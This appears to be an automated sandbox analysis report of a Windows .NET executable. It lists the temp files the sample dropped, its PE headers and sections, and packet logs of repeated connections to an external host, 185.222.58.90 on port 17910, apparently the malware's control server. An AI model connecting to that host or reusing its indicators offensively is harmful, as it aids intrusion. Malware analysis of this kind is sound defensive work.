                                                                Preview:TQDGENUHWPOCQZOYQQOVXFSKSTVMXJXDOGOCIXCWWCXZFXOXQRGWSWDAFLWSMHLOUKOWNWJZPGDUHFUOAFKMGKZSPLKHWSRWYDTUFQOCIDPUEJWNIBXMGMKONCTOFFHYQKJVCNHZNUJEOZENPYTNSRLJTSURGKKJCGXUYFVMRAZPMGMDFRPRULQNWCKIPLLNINZSUGVTDCGZRWHZSXIUPCOMERQUITTFVYNMJAILLEFBCIQKNYWQSMDKSPSFLHLQBLKQAEZLJWWEWETIASOLCSWFIXBUJNPPEHQBZSFNEUZFVYKPQARONAVPSWNEPHPCPVTKNOEKMSHCSJAPMMZNDUPXNUGZKLFLOSEJTWSTMGTHPBJYPYNXJEWKYXAKPNBGAIGQOTOBFIGYXOMEBYKJUBUPHBKYEZJVKWOADWXTWXLHTSSJJEERVQTAWAOSLBHXXTKQCBLUENVULQPPPVUVFHCENGXCXUSAZURTDXJOJRVDUZPYWRIUSKDWALNPHAPYXYAERIQLWZTHISZCPAZAYJUBWJKBPUIGQPXVFOKOOGOSRASRQRXJZKSCRTHITTCLDLPTEZZSZSDTBFLVSLNNNCFBQWXQTNNRLQJVYZMPDHMVNLLNOLJVTFFUHUBHWDTBQKSTZEJFYHQBZJSAPJXIHOPGXRYNJUZKHMXOGNCKLDPKDLFZKFWOTJGQBXZEFMAORUVHQXYVLBLBKUEYUWVIBYNGTPNSHZOAVYSECDNRJFEGATTFBNLTQQUDTNINSTLBVFBUSUTOHOOYLKJQMLOIFMKXGXCKWFSCHWJWRKMACAXTEHDSMYMGSWIIEYXHNGOVDUHWQGNNBGIFZMCRKAOJVZMMWSNYYKMFTRQPINRLBTNCHSQPNQPZMLLJEOZIIMQPOJUGCVEYNAAXXWRXITWSOITACOECPNTBINMRHSPKJBVHYDZYLQUMSXHKEBERJIZQEQTSXEYVHBIPMZLMZSQIREGSQGAJPZFYHOBSSQYU

                                                                C:\Users\user\AppData\Local\Temp\tmpCAB9.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1026
                                                                Entropy (8bit):4.70435191336402
                                                                Encrypted:false
                                                                SSDEEP:24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
                                                                MD5:8C1F71001ABC7FCE68B3F15299553CE7
                                                                SHA1:382285FB69081EB79C936BC4E1BFFC9D4697D881
                                                                SHA-256:DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
                                                                SHA-512:8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
                                                                Malicious:false
                                                                Preview:NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVPHWPWLYJIOFFNQHAOBSRORLXUKIHEETKPFDPHQAGTKOMEWPBYGMTXHOQFINPIQARIVGCFUFIETTFUMCUDHRHCSTIZWRDJEHWOLAFOSWAVIGSWONBSKFWHCQAGHLWBKAFUQUULJRVZNUGGVOCCVTTWZEZFPJKZDJMHDYXQKDPLRECPAAEZVBXFDGZJIUGNMOEAISGBSPVTDRADHODLAXUFWZVTJPIGKERLENNAJHHHNNAPBWXCOGJSNVQJJEEPSMESQKGYOHXVMZQNSMSJHQHSGCJZCBZJXMLGNQQKZRIQSQCAWXZFCRMGMMLKHZDWNQTXPTYWGWNQQEQWEZJPQVPOASQIIJYWPUVLHFSLMGHWITYEKRNYGXYTAJZSRGYUWTMRNOICIEPMAYUOIDDOUSYSPAILYQQLYDTBOTEDGSCNXDRRQMOBWCQMDCQXTPEXDKPLVRMFZSKERSAULAYLSOJGDMFTZECKZYYLQVVDOMXISCOBUPPSAYUFOWOCBDJALHRAXDIKEMRYGQMEYTENAHXKWSVJEDEJTIUWZDHLIBKQRVMQLSAYIIOZDWWOLHCJUVJVRYJLTIENWCTYDOSJVSFUHOQPOXCMFGTAWFRCZJNYBCRPUFRUMZIBQDOVOBMFCHMMFHSSJZDCZNMWNCNSQMZWHCOEYNCAFONSABBQCKAPFWJIGKNUCUJZWUKRWIOFVWQWFSYAHDWXEMJKFZYMRVIRAMPVKBXONBJFTXIBDAYIE

                                                                C:\Users\user\AppData\Local\Temp\tmpDB01.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):40960
                                                                Entropy (8bit):0.792852251086831
                                                                Encrypted:false
                                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                Malicious:false
                                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\tmpF6F9.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\DBAcglWJwi.exe
                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1026
                                                                Entropy (8bit):4.698801429970146
                                                                Encrypted:false
                                                                SSDEEP:24:qYZf7NYgK11E+8TKka0vEdKPG8TQZjtLMiMl+gc:Zk1k3a0Ma18Z4A
                                                                MD5:488BC4EF686937916ECE6285266A6075
                                                                SHA1:498BA8EBDA3DABD222532DB0C0D6262B0C5A7E08
                                                                SHA-256:8DEB161A95E22B50B1BD88EDBBB4312003788B8A6B35D22AEC02CC200FF34C17
                                                                SHA-512:1B7AC223F6277A74893597499F79D674E0798699081B0B2602123B9118E3F68815A951F787E71E5C35589E5AACF987E9C8F669FF9A9F6E94209F15DADEFF40A3
                                                                Malicious:false
                                                                Preview:ZSSZYEFYMUQEKZVPQBMSGZPGFJSTPVKSKKYYOJJIVKJRXMBDCMKBNSXEZOYYLLCVGBCQCKVUSXHLTTLRBHPCNSEMRROKBXFGQJZTBAVNRJJQBKWQYWINUTDWXUKTWQTLFVKQJLRXVFMCOZRZYQJKBITZONPSKVFYGVFRXBDOVYHVEMAQOEYMKHGFIUSMUZFLKRKBNYFQULYASQJWIMXTPKLTXNGJEWMVSDMVYEHMDPUBWHXLMDGALITFYOPNEIQSZIFTQVUSLRLYPKRTXNKPZMOTSFMCTTCARDYTVYJNZYBYCYFEMWWKCHMOTEZUTCREBZPMVCXBYPYANERMGIWQGRLDPRJEURITRIHETMYHEDRHVZWCMDHNFFZGLKKJQGCRIABTVOOSCMRDMCYBMDQOGHUUZIQUDIGWJEDYSILALQBOBHJCJXMYCXWMKWTAZTAUZGCOOYTBWHVSAMUGEMKVHNGWYROVAEWXIOJKNUUAHUZJKSBJBZHYPRMGXULRNKCEDZBZFSCLCLARQDJMLPUKDSUWUIZMUDIKRKQZKQOXAYQYQTWHEIQXYYRXUJUIJQHETOHAPWXNCXFRKNXDPMNGFVZLBDFQUQRTHWUPUFFOEETFIAMWILGGLMPNTNBWFAVUGTBECKTLKLZQTWDYQGKSATWYWCKMJUIBSPWHFOXTNCPNZROSZPOSCRTUVGPSNZPJGXCOSDTDGNOFJGXANNYNPDRWRWHRMJKJZLEGOXMOOUXTCHTTXGYUQDVKJZMOUPMXIJCGGEIUPFMUDPJPVMINFDESCQIALHEUSISIOWESWYRPEKDPMSSUALHIWLZBLYGOHEFVJWNLRWWTIYJVKFFZJKDTZXWMWMLHMPMCDJASZUPRTYGWPHHTFMTSSQIBOUWXAGDKQACWGATARXNPCMQFCVREPARZFKWLUWYDUSCBVSUXEQBCXPUESWMVITZYZKPVGHRQVMKQXDEITVASTNPYLAQHWTYQQEBOGBVRUVAJ

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):5.9602213543888665
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                File name:DBAcglWJwi.exe
                                                                File size:97792
                                                                MD5:0b17057228d36c548c8c90297a81bf75
                                                                SHA1:51605a0779d86d4c366f57bc09bf0d876cf0c029
                                                                SHA256:e9d0051a518d260fa503b82b6d4be8535a0bad93f2e69b2b75a6f78e44a7eb82
                                                                SHA512:8b4fd95f637bca2d7a978a20a1b614ef5c9d54cd549d705cd9e26faeb2e585f56ae89821330e1ef01fc6be413a9bdc66f98a907563d41fa299382bc809e89f3b
                                                                SSDEEP:1536:xqsIjlqzWlbG6jejoigIr43Ywzi0Zb78ivombfexv0ujXyyed2VteulgS6pk:f0UeYr+zi0ZbYe1g0ujyzdxk
                                                                TLSH:2DA35D20679C9F19EAFD1B74B4B2012043F1E08A9091FB4B4DC164E71FA7B866957EF2
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..t............... ........@.. ....................................@................................

                                                                File Icon

                                                                Icon Hash:00828e8e8686b000

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x41932e
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows cui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x192dc0x4f.text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x4de.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1c0000xc.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x20000x173340x17400False0.44868321572580644data6.015298486966851IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rsrc0x1a0000x4de0x600False0.3756510416666667data3.723940100220831IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x1c0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountry
                                                                RT_VERSION0x1a0a00x254data
                                                                RT_MANIFEST0x1a2f40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                Imports

                                                                DLLImport
                                                                mscoree.dll_CorExeMain

                                                                Network Behavior

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jul 11, 2022 10:31:12.063498974 CEST4976117910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:12.086769104 CEST1791049761185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:12.086947918 CEST4976117910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:12.406061888 CEST4976117910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:12.432923079 CEST1791049761185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:12.446994066 CEST4976117910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:12.471749067 CEST1791049761185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:12.668962955 CEST4976117910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:20.871911049 CEST4976117910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:20.896469116 CEST1791049761185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:20.897109985 CEST4976117910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:20.940469980 CEST1791049761185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:20.940524101 CEST1791049761185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:20.940551043 CEST1791049761185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:20.940561056 CEST1791049761185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:20.940603971 CEST4976117910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:20.940635920 CEST4976117910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.758683920 CEST4976117910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.759809971 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.781723976 CEST1791049761185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.781851053 CEST4976117910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.783668041 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.783751965 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.799798965 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.823388100 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.824430943 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.847560883 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.847615957 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.847702980 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.847757101 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.870985985 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.871119976 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.871206999 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.871316910 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.871572018 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.871743917 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.894200087 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.894366980 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.894530058 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.894655943 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.894759893 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.894860029 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.895118952 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.895200014 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.895253897 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.895278931 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.895571947 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.895678043 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.895749092 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.895842075 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.896003962 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.896084070 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.917526007 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.917634964 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.917679071 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.917752028 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.917823076 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.917871952 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.918060064 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.918126106 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.918297052 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.918349981 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.918654919 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.918723106 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.918854952 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.918910027 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.919054985 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.919122934 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.919377089 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.919459105 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.919630051 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.919711113 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.920628071 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.920770884 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.940438032 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.940593958 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.940711975 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.940817118 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.940891981 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.941032887 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.941359997 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.941448927 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.941550970 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.941672087 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.941793919 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.941874981 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.942147017 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.942224979 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.942504883 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.942621946 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.943504095 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.943598032 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.943696976 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.943767071 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.964524984 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.964592934 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.964631081 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.964693069 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.964884996 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.964967966 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.965086937 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.965511084 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.965660095 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.966114044 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.966200113 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.966392040 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.966495037 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.966800928 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.966892004 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.967103958 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.967217922 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.967541933 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.967627048 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.967914104 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.968128920 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.968223095 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.987592936 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.987693071 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.987773895 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.987843990 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.987883091 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.987946987 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.988285065 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.988408089 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.988521099 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.988596916 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.988677979 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.988776922 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.988964081 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.989039898 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.989202976 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.989291906 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.989681959 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.989774942 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.989969969 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.990040064 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.990202904 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.990278959 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.990521908 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.990580082 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.990845919 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.990902901 CEST4983717910192.168.2.5185.222.58.90
                                                                Jul 11, 2022 10:31:42.991118908 CEST1791049837185.222.58.90192.168.2.5
                                                                Jul 11, 2022 10:31:42.991194010 CEST4983717910192.168.2.5185.222.58.90
